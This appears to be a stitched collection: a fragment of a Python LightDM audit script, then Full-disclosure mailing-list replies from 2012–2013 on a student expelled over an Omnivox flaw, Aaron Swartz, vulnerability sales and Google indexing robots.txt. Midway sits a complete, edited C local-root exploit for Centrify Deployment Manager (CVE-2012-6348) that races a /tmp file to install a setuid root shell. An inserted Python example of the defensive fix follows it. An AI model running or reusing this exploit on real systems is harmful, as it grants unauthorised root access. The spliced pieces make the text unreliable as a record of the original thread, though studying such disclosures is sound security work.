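    a main config without allow-guest, a drop-in that disables the guest, and
    two home directories with the modes from the post. Returns (main, dropin, home_root)."""
    root = Path(tempfile.mkdtemp(prefix="lightdm-audit-"))
    main_conf = root / "lightdm.conf"
    main_conf.write_text("[SeatDefaults]\nuser-session=ubuntu\n")
    dropin = root / "50-no-guest.conf"
    dropin.write_text("[SeatDefaults]\nallow-guest=false\n")
    home_root = root / "home"
    home_root.mkdir()
    for name, mode in (("open", 0o755), ("closed", 0o700)):
        d = home_root / name
        d.mkdir()
        os.chmod(d, mode)                      # explicit chmod so the umask cannot interfere
    return str(main_conf), str(dropin), str(home_root)


if __name__ == "__main__":
    confs = [LIGHTDM_CONF, *sorted(glob.glob(LIGHTDM_DROPINS))]
    print(audit(confs, "/home"))
```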
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
On Fri, Jan 25, 2013 at 12:07 PM, valdis.kletni...@vt.edu wrote:
> On Fri, 25 Jan 2013 09:57:51 +, Dan Ballance said:
>> ...
>
> Doesn't matter if he ends up a corporate knob or a freedom fighter. If he says I promise to XYZ you want him to be trustworthy on said promise.

You might want to ask the guys in Anonymous who got ratted out by one of their own how they feel about the word trustworthy regarding the rat who said I promise not to rat you out. :)

There is no honor among thieves (or corporations, or lawyers, or...)
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
On Thu, Jan 24, 2013 at 2:22 PM, valdis.kletni...@vt.edu wrote:
> On Thu, 24 Jan 2013 19:59:53 +0100, Stefan Weimar said:
>>> 1) The kid, as part of his major, signed an ethics document.
>>
>> A better solution would have been to not do the steps 1 and 2 but make an NDA (Ok, we know and you know but that's enough by now.) instead. I mean, some kind of responsible disclosure. By proposing this ethics document it was the college being unprofessional and not the kid.
>
> I think you misunderstand - the ethics document was signed *when he applied as a student*. If you think that's unprofessional, you might want to consider that doctors, lawyers, and other professions have ethics standards as well. As does anybody who has a CISSP:

That has not stopped lawyers and judges from perverting the legal system in the US. Judge James Ware FTW! http://en.wikipedia.org/wiki/James_Ware_(judge).

> https://www.isc2.org/ethics/default.aspx
>
> TLDR; Just kidding. It's actually quite short.

I wonder if the college gave him a contract, and called it a code of ethics.

> I'd say anybody who persisted in doing something after they promised not to would be running afoul of the necessary public trust and confidence clause of the CISSP code of ethics?

Well, there could be a lot of wiggle room. How much of it is subjective? Is it like Christianity, where the 10 Commandments are taken as 10 Suggestions?

Jeff
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:
> Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already.

If his personal information is in the proprietary system, I believe he has every right to verify the security of the system. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check.

Open question: does Canada have Security Testing and Evaluation (STE) and Reverse Engineering (RE) exemptions in its laws? Even the United States' DMCA has them. For reference for others in the US who may be subject to bullying (companies have tried it on me): DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.

>> a class A moron.

What does that make Omnivox, which appears to have done no testing?

Jeff

> On 21 Jan 2013, at 21:10, Benji m...@b3nji.com wrote:
>> He found the vulnerability by running Acunetix against the system. He is what most would describe as, a class A moron.
>>
>> On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures lisfr...@chem.toronto.edu wrote:
>>> A student has been expelled from Montreal's Dawson College after he discovered a flaw in the computer system used by most Quebec CEGEPs (General and Vocational Colleges), one which compromised the security of over 250,000 students' personal information.
>>>
>>> Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a member of the school's software development club, was working on a mobile app to allow students easier access to their college account when he and a colleague discovered what he describes as "sloppy coding" in the widely used Omnivox software which would allow "anyone with a basic knowledge of computers to gain access to the personal information of any student in the system, including social insurance number, home address and phone number, class schedule, basically all the information the college has on a student."
>>>
>>> http://tinyurl.com/bcdrelh
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000 students' personal data
On Mon, Jan 21, 2013 at 5:57 PM, Ian Hayes cthulhucall...@gmail.com wrote:
> On Mon, Jan 21, 2013 at 2:54 PM, Jeffrey Walton noloa...@gmail.com wrote:
>> On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:
>>> a class A moron.
>>
>> What does that make Omnivox, which appears to have done no testing?
>
> The two conditions are not mutually exclusive.

Hence the reason for "appears to have done no testing". Developer driven security is some of the worst security I have seen. It's the reason for this (and a few other) lists. Obvious flaws (obvious to a security professional) tell me Omnivox has problems with their engineering process (perhaps incomplete testing, perhaps no testing).

Jeff
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000 students' personal data
On Mon, Jan 21, 2013 at 7:44 PM, Julius Kivimäki julius.kivim...@gmail.com wrote:
> How is Omnivox's security relevant when this kid is running DoS tools on their sites? (Acunetix is a nice database heavy HTTP flood tool.)

I don't know. Could Acunetix be used to find a 250,000 record information leak (injection?)? If not, perhaps it was exaggerated by the site's owner in order to deflect bad press and tip the scales of justice.

Manipulating the justice system is nothing new. Ma Bell did it with Mitnick. They claimed millions in losses due to Mitnick, but failed to list it in their SEC filings (required by law at the time). They would not answer questions pertaining to the 'accounting irregularities' when cross examined during trial.

Jeff

> 2013/1/22 Jeffrey Walton noloa...@gmail.com
>> On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:
>>> Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already.
>>
>> If his personal information is in the proprietary system, I believe he has every right to verify the security of the system. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check.
>>
>> Open question: does Canada have Security Testing and Evaluation (STE) and Reverse Engineering (RE) exemptions in its laws? Even the United States' DMCA has them. For reference for others in the US who may be subject to bullying (companies have tried it on me): DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.
>>
>>> a class A moron.
>>
>> What does that make Omnivox, which appears to have done no testing?
>>
>> Jeff
>>
>>> On 21 Jan 2013, at 21:10, Benji m...@b3nji.com wrote:
>>>> He found the vulnerability by running Acunetix against the system. He is what most would describe as a class A moron.
>>>>
>>>> On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures lisfr...@chem.toronto.edu wrote:
>>>>> A student has been expelled from Montreal's Dawson College after he discovered a flaw in the computer system used by most Quebec CEGEPs (General and Vocational Colleges), one which compromised the security of over 250,000 students' personal information.
>>>>>
>>>>> Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a member of the school's software development club, was working on a mobile app to allow students easier access to their college account when he and a colleague discovered what he describes as "sloppy coding" in the widely used Omnivox software which would allow "anyone with a basic knowledge of computers to gain access to the personal information of any student in the system, including social insurance number, home address and phone number, class schedule, basically all the information the college has on a student."
>>>>>
>>>>> http://tinyurl.com/bcdrelh
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000
On Mon, Jan 21, 2013 at 8:06 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote:
> Jeffrey Walton wrote:
>> On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:
>>> Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already.
>>
>> If his personal information is in the proprietary system, I believe he has every right to very the security of the system.
>
> BUT how can he verify (I assume that was the word you meant?) proper security of _his_ personal details? He would have to test using someone _else's_ access credentials. That is unauthorized access by most relevant legislation in most jurisdictions.

Yes, my bad. Autocorrect has turned my bad spelling into bad grammar.

> Alternately, he could try accessing someone else's data from his login, and that is equally clearly unauthorized access. He and his colleague who originally discovered the flaw may have used each other's access credentials to access their own data, or used their own credentials to access the other's data _in agreement between themselves_ BUT in so doing most likely broke the terms of service of the system/their school/etc, _equally_ putting them afoul of most unauthorized access legislation.
>
>> Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check.
>
> BUT he has no responsibility to check on anyone _else's_ data and no _authority_ to use anyone else's credentials to check on his own.

I would argue that's part of testing the system. If I log in and get a token back, I'm going to try a simple increment (and other transformations on the token) to see if it's predictable. If I happen to get another's record, that demonstrates the flaw in the system and not 'testing on behalf of another'.

What did he do with the other records he retrieved? I suspect he used them as proof of concept; and did not use them for a work visa or credit card. But I could be wrong.

> So, what responsibility does he really have?

We have the responsibility to protect our own data, because class-A fuckups like Omnivox don't do it. Once the data is lost, you can't get it back - the genie is out of the bottle. That's coming from a guy who was part of a breach in the 1990s. It cost me about $10,000 to fix it back then. It started again in the mid-2000's. I'm not fixing it this time.

> It sounds like he should have left well alone once he had reported this to the university and the vendors. That he did not have the sense or moral compass to recognize that tells us something important about him.

Does that sword cut both ways? How about Nokia/Opera and their destruction of the secure channel? How about Trustwave and their fraudulent certificates that destroyed the secure channel? Or do these things (law and moral compasses) only apply to individuals?

Jeff
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
>
> Above link to remove this prosecutor needs to have signatures by February 11.

Congratulations. It looks like you exceeded the threshold required by a factor of nearly two.
Re: [Full-disclosure] White Paper: Detecting System Intrusions
On Fri, Jan 18, 2013 at 3:21 PM, valdis.kletni...@vt.edu wrote:
> On Wed, 16 Jan 2013 12:39:18 -0500, Almaz said:
>> How to detect system intrusions? What are the techniques? Can one character difference in the output be an indicator of compromise?
>
> Paging Cliff Stoll.. Cliff Stoll to the courtesy phone...

Damn. You can only get "The KGB, the Computer, and Me" on VHS!
Re: [Full-disclosure] How to prevent HTTPS MitM
On Thu, Jan 17, 2013 at 3:56 PM, Luigi Rosa li...@luigirosa.com wrote:
> If this message is offtopic, please excuse me. I was reading about Nokia HTTPS MitM. Many corporate firewalls can MitM HTTPS for content inspection and many governments do this for their reasons. I was thinking: could it be possible to create a fake HTTPS stream to DoS the MitM attempt?

Stop conferring trust. Pin the certificate or public key. Google used it to vet out the Diginotar compromise in Chrome (all other browsers suffered). It's similar to SSH's StrictHostKeyChecking option. It's also on track for internet standards: http://tools.ietf.org/html/draft-ietf-websec-key-pinning-04.

Use Secure Remote Password (SRP). SRP is basically Diffie-Hellman using the password as an exponent (lots of handwaving).

Don't trust browsers. That includes Mozilla (Trustwave and the closed door, back room deals) or Opera (Nokia and its 'Acceleration Interception').

Jeff
Re: [Full-disclosure] how to sell and get a fair price
On Wed, Jan 16, 2013 at 5:19 AM, grem...@gremlin.ru wrote:
> On 15-Jan-2013 06:28:53 -0500, Jeffrey Walton wrote:
>>> ... Is it really necessary to stay anonymous? Writing hmmm... articles about vulnerabilities for some (very specific) media and getting a hmmm... fee for that is mostly legal. Opposed to the use of that information...
>>
>> I think it's a slippery slope in the US.
>
> I'm happy to reside outside of the US...
>
>> On one hand, you have, for example, Computer Fraud and Abuse Act (CFAA), Digital Millennium Copyright Act (DMCA), and Unlawful Intercept. US corporations are rarely prosecuted under the law [...] but individuals are regularly prosecuted
>
> That means, all these activities should not be performed in the US (and other countries with similar Draconian laws)...

It's not so much Draconian laws as it is greedy politicians who take bribes from corporate America to grow their wealth, and then spend the rest of their careers performing fellatio on industry and their special interests (just an observation :).

> In general, this problem may be solved using the international division of labour, when people do only what is legal in their country. Example: reverse engineering is legal in Russia (unless it is used to create the competing product), so I can perform it and share the results. Someone else may then find suspicious code, other people may prove that code is vulnerable by writing an exploit... In this case, everyone performs in a legal manner - except, obviously, the script kiddies who will use the ready tool to break something.

It's legal in the US, too. Dr. Jon Callas (one of PGP's co-founders) was fortunate (persistent?) enough to have the provisions added to DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.

Jeff
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 2:48 AM, grem...@gremlin.ru wrote:
> On 14-Jan-2013 15:39:53 -0500, valdis.kletni...@vt.edu wrote:
>>> After all, a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not?
>>
>> Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). [...] More interesting is the question of how to enforce a copyright claim while remaining anonymous...
>
> Is it really necessary to stay anonymous? Writing hmmm... articles about vulnerabilities for some (very specific) media and getting a hmmm... fee for that is mostly legal. Opposed to the use of that information...

I think it's a slippery slope in the US. On one hand, you have, for example, Computer Fraud and Abuse Act (CFAA), Digital Millennium Copyright Act (DMCA), and Unlawful Intercept. US corporations are rarely prosecuted under the law (confer, Trustwave [1], Nokia [2]); but individuals are regularly prosecuted (confer, Weev (et al) [3], Wise Guys [4], Dmitry Sklyarov [5]).

I'm amazed at how federal law is 'opt-in' for US corporations, but individuals such as Weev/Goatse and Sklyarov must endure politically motivated judicial heavy handedness. In Goatse's case, they aggregated public data (names and email addresses) from a public server offering public services hanging off a public internet. In Sklyarov's case, he demonstrated flaws in Adobe's PDF DRM scheme. Note that for Sklyarov, the DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.

If I had copyright over material used for security testing and evaluations, I would probably assert my copyright. If I wrote malware, I would likely want to stay anonymous (confer, David L. Smith and Melissa macro-virus [6]).

Jeff

[1] http://www.computerworld.com/s/article/9224082/Trustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment
[2] http://www.zdnet.com/nokia-hijacks-mobile-browser-traffic-decrypts-https-data-709655/
[3] http://en.wikipedia.org/wiki/Weev
[4] https://www.eff.org/deeplinks/2010/07/cfaa-prosecution-wiseguys-not-so-smart
[5] http://en.wikipedia.org/wiki/Dmitry_Sklyarov
[6] http://en.wikipedia.org/wiki/Melissa_(computer_virus)
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 10:40 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote:
> In general practice, wherever you would like to publish, the publisher will ask for copyright rights. Thus, a site publishing exploits can do the same and thus may protect rights of the author, well, together with its own. After all, my idea was about fair sale, and that could require release of rights to the mediator/auctioneer. Somebody I would bet is having a fair thought "buddy, would you do your idea?" I need to say frankly that I do not plan. I'm stretched by my current www.201cmr1700ma.com and its very likely extension. But feeling unfairness, will be glad to support and devote some time.

Sometimes the publisher cannot protect the identity of an anonymous author. The real Rex Feral was dragged into court. http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors

Jeff

> From: Christian Sciberras [mailto:uuf6...@gmail.com]
> Sent: Monday, January 14, 2013 4:17 PM
> To: Valdis Kletnieks
> Cc: Mikhail A. Utin; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] how to sell and get a fair price
>
> Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder?
>
> On Mon, Jan 14, 2013 at 9:39 PM, valdis.kletni...@vt.edu wrote:
>> On Thu, 10 Jan 2013 12:03:03 -0500, Mikhail A. Utin said:
>>> After all, a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not?
>>
>> Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). In the US, there's an exemption for work product of federal employees - that's one of the few ways for US-produced material to become public domain (expiration of term is the other one, but with ever-increasing copyright terms, it's unclear that anything will ever actually expire in the US). More interesting is the question of how to enforce a copyright claim while remaining anonymous...
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 3:07 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote:
> Jeffrey Walton wrote:
>> Sometimes the publisher cannot protect the identity of an anonymous author. ...
>
> That may be true -- I don't know...
>
>> ... The real Rex Feral was dragged into court. http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors
>
> ...but that claim is not supported by your reference. The Wikipedia article simply does not address whether the pseudonymous author's real identity was exposed in the legal proceedings or not. Note that the case was Rice v Paladin Enterprises and the legal claim was that Paladin (the _publishers_) aided and abetted a murder.

Oh, my bad. That was the book which caused the subsequent court actions, and not a normative reference to loss of anonymity.

> Presumably (again, IANAL) they could have brought a similar suit against the author, but saw the publisher as having deeper pockets (and perhaps reasonably assumed, or even knew, that the publisher would have extensive commercial insurance to cover any damages ruling they may receive if their case prevailed).

I seem to recall two or three things from the Montgomery County murders (it's a county close to where I live, so I watched the American Justice episode). The publisher indemnified the author. The publisher was not able to retain anonymity for Rex Feral. In fact, I seem to recall an excerpt of the court proceedings with the lady on the stand.

Jeff
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
>
> Above link to remove this prosecutor needs to have signatures by February 11.

It's unfortunate Swartz committed suicide over the incident. http://www.latimes.com/news/obituaries/la-me-0113-aaron-swartz-20130113,0,5232490.story

Jeff
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 3:35 PM, valdis.kletni...@vt.edu wrote:
> On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said:
>> On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
>>> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
>>>
>>> Above link to remove this prosecutor needs to have signatures by February 11.
>>
>> It's unfortunate Swartz committed suicide over the incident.
>
> From the fine article: "On his blog, Swartz had written of his history of depression." Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many.

Perhaps. In the absence of a note, all we have to go on is the family and girlfriend's experience with his personality: "On Saturday, his family and girlfriend called his death the product of a criminal justice system rife with intimidation and prosecutorial overreach and blamed decisions by the Massachusetts U.S. attorney's office and MIT for contributing to his death."

Jeff
Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager v2.1.0.283 local root
I've got a feeling you will not be sent to any more vendor classes :)

On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar lar...@me.com wrote:

```c
/* Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
 * Centrify released a fix very quickly - nice vendor response.
 * http://vapid.dhs.org/exploits/centrify_local_r00t.c
 * CVE-2012-6348 12/17/2012
 * http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
 *
 * Greetings vladz, Thanks for the inotify syscall technique.
 * This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
 *
 * Run the exploit and wait for administrator to analyse or deploy software to the system.
 *
 * larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
 * [*] Launching attack against "centrify.cmd.0"
 * [+] Creating evil script (/tmp/evil)
 * [+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
 * [+] Initialize inotify
 * [+] Waiting for root to launch centrify.cmd.0
 * [+] Opening root shell (/tmp/sh)
 * #
 *
 * Larry W. Cashdollar @_larry0
 */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>

/* Create a small c program to pop us a root shell */
int create_nasty_shell(char *file)
{
    char *s = "#!/bin/bash\n"
              "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}' > /tmp/sh.c\n"
              "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
              "chmod 4755 /tmp/sh;\n";
    int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
    write(fd, s, strlen(s));
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    int fd, wd;
    char buf[1], *targetpath, *cmd, *evilsh = "/tmp/evil", *trash = "/tmp/trash";

    if (argc < 2) {
        printf("Usage: %s <target file>\n", argv[0]);
        return 1;
    }

    printf("[*] Launching attack against \"%s\"\n", argv[1]);
    printf("[+] Creating evil script (/tmp/evil)\n");
    create_nasty_shell(evilsh);

    /* "/tmp/" + name + NUL; the posted code sized this with sizeof(argv[1]),
     * i.e. the size of a pointer, which overflows for any realistic name. */
    targetpath = malloc(strlen(argv[1]) + 6);
    sprintf(targetpath, "/tmp/%s", argv[1]);
    cmd = malloc(strlen(targetpath) + 12);       /* "/bin/touch " + path + NUL */
    sprintf(cmd, "/bin/touch %s", targetpath);
    printf("[+] Creating target file (%s)\n", cmd);
    system(cmd);

    /* Block until root touches the permissions of the pre-created file,
     * then swap the prepared script into its place. */
    printf("[+] Initialize inotify\n");
    fd = inotify_init();
    wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
    printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
    syscall(SYS_read, fd, buf, 1);
    syscall(SYS_rename, targetpath, trash);
    syscall(SYS_rename, evilsh, targetpath);
    inotify_rm_watch(fd, wd);

    printf("[+] Opening root shell (/tmp/sh)\n");
    sleep(2);
    system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
    return 0;
}
```
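The exploit above works because the privileged tool later operates on a fixed, predictable path under the world-writable /tmp that an unprivileged user can create first. As an added example (not from the advisory, the exploit or the vendor), here is the defensive pattern a privileged deployment tool should use in Python: create with O_CREAT|O_EXCL|O_NOFOLLOW so anything pre-planted at the path (regular file or symlink) makes the open fail, and keep such files in a private mode-0700 directory with an unpredictable name instead. The file name centrify.cmd.0 is borrowed from the advisory's sample run; the planted content, the directory prefix and the helper names are constructed for this example.

```python
import os
import shutil
import stat
import tempfile


def create_private_file(path: str, mode: int = 0o600) -> int:
    """Create `path` atomically, refusing anything that already exists there.

    O_CREAT|O_EXCL makes the kernel fail with EEXIST if a file or a symlink
    (dangling or not) is already present, so a name pre-created by another
    user can never be reused. O_NOFOLLOW is belt-and-braces against symlink
    games on the final path component. Returns the open descriptor.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(path, flags, mode)
    st = os.fstat(fd)
    # We just created it, so it must be a regular file owned by us.
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
        os.close(fd)
        raise RuntimeError("unexpected object at %s after O_EXCL create" % path)
    return fd


def private_workdir(prefix: str = "deploy-") -> str:
    """A mode-0700 directory with an unpredictable name: where a privileged
    process should keep scripts it will execute, rather than /tmp/<fixed>."""
    return tempfile.mkdtemp(prefix=prefix)


def workdir_is_private(workdir: str) -> bool:
    """True when only the owner can list, create or remove entries."""
    return stat.S_IMODE(os.stat(workdir).st_mode) == 0o700


def _try_create(path: str) -> str:
    try:
        fd = create_private_file(path)
    except OSError:          # EEXIST from O_EXCL, or ELOOP from O_NOFOLLOW
        return "refused"
    os.close(fd)
    return "created"


def attempt_preplanted(workdir: str) -> dict:
    """Reproduce the exploit's precondition (something already sits at the
    path) and show that the hardened open refuses it. The names are the
    advisory's sample file name plus constructed siblings."""
    results = {}

    planted = os.path.join(workdir, "centrify.cmd.0")
    with open(planted, "w") as f:
        f.write("#!/bin/sh\necho planted\n")   # constructed attacker content
    results["regular_file"] = _try_create(planted)

    victim = os.path.join(workdir, "victim")
    open(victim, "w").close()
    link = os.path.join(workdir, "centrify.cmd.1")
    os.symlink(victim, link)                      # planted symlink to another file
    results["symlink"] = _try_create(link)

    results["fresh_path"] = _try_create(os.path.join(workdir, "centrify.cmd.2"))
    return results


if __name__ == "__main__":
    d = private_workdir()
    try:
        print("private dir:", workdir_is_private(d), attempt_preplanted(d))
    finally:
        shutil.rmtree(d)
```

The regular-file and symlink cases come back "refused" and only the untouched name is "created"; the same flags are available from C as the corresponding open(2) bits, which is where a tool like the one in the advisory would apply them.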
Re: [Full-disclosure] [btrfs] is vulnerable to a hash-DoS attack
On Thu, Dec 13, 2012 at 8:20 AM, Pascal Junod (Mailing Lists) mailingli...@junod.info wrote:
> Hello folk,
>
> The btrfs file system, part of the linux kernel, is vulnerable to a trivial hash-DoS attack. More details can be found here: http://crypto.junod.info/2012/12/13/hash-dos-and-btrfs/

Kosta's comment was funny as hell: "If only the B-Tree Filesystem had access to a data structure immune to this… like a B-Tree."
Re: [Full-disclosure] Google's robots.txt handling
On Thu, Dec 13, 2012 at 7:52 AM, Philip Whitehouse phi...@whiuk.com wrote:
> I restate my email's second point. Google is indexing robots.txt because (from all the examples I can see) robots.txt doesn't contain a line to disallow indexing of robots.txt. It is possible that some web sites provide actual content in a file that happens to be called robots.txt (e.g. a website concerned with AI development). Could Google do better by removing the file? Sure. But as webmasters haven't told them not to, even though they have provided other files not to index, Google is doing exactly what they were asked.

Webmasters don't have to in the US - the Computer Fraud and Abuse Act (CFAA) means Google (et al) must operate within the authority granted by the webmasters. If that means the webmasters decide they don't want their site crawled, then Google (et al) has exceeded its authority and broken US Federal law. Just ask Weev.

This system needs a submission based whitelist.

Jeff
Re: [Full-disclosure] Google's robot.txt handling
On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote:
> I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway.

I kind of agree here. The information is valuable for the reconnaissance phase of an attack, but it's not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since it's at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public).

Jeff

> On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote:
>>> If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, <snipped>
>>
>> Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to its logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when coupled with actual security - but relying on it alone is just daft. Expecting the world to change so bad habits have no consequence is dangerously naive. I suspect you're looking too hard at finding fault with Google - who are complying with the robots.txt. Read the spec - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen in places that can be seen.
>>
>> On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote:
>>>> From: Hurgel Bumpf l0rd_lunatic () yahoo com
>>>> Date: Mon, 10 Dec 2012 19:25:39 + (GMT)
>>>>
>>>> Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not clearly a google vulnerability, but exposes website information that is not really intended to be public. Conan the bavarian
>>>
>>> Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question you raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must have missed the first day of web school.
Re: [Full-disclosure] Google's robot.txt handling
On Tue, Dec 11, 2012 at 5:53 PM, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, it's a stupid idea. :) I prefer to know where I am with a service; and (IMHO) I would prefer to query (occasionally) Google for my CC instead of waiting for someone to start taking funds off it. Hiding it only provides a false sense of security - it will last until someone finds the service leaking out CCs. Agreed. How about search engine data by other crawlers that was not sanitized? This is especially the case with robots.txt. Can someone on the list please define a good web crawler? Haha! Milk up the nose. I think the problem here is that people are plain stupid and throw in direct entries inside robots.txt, whereas they should be sending wildcard entries. Couple that with actually protecting sensitive areas, and it's a pretty good defence. We now know you don't need a robots.txt for exclusion. Just ask Weev. Jeff On Tue, Dec 11, 2012 at 10:38 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote: I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway. I kind of agree here. The information is valuable for the reconnaissance phase of an attack, buts its not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since its at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public). 
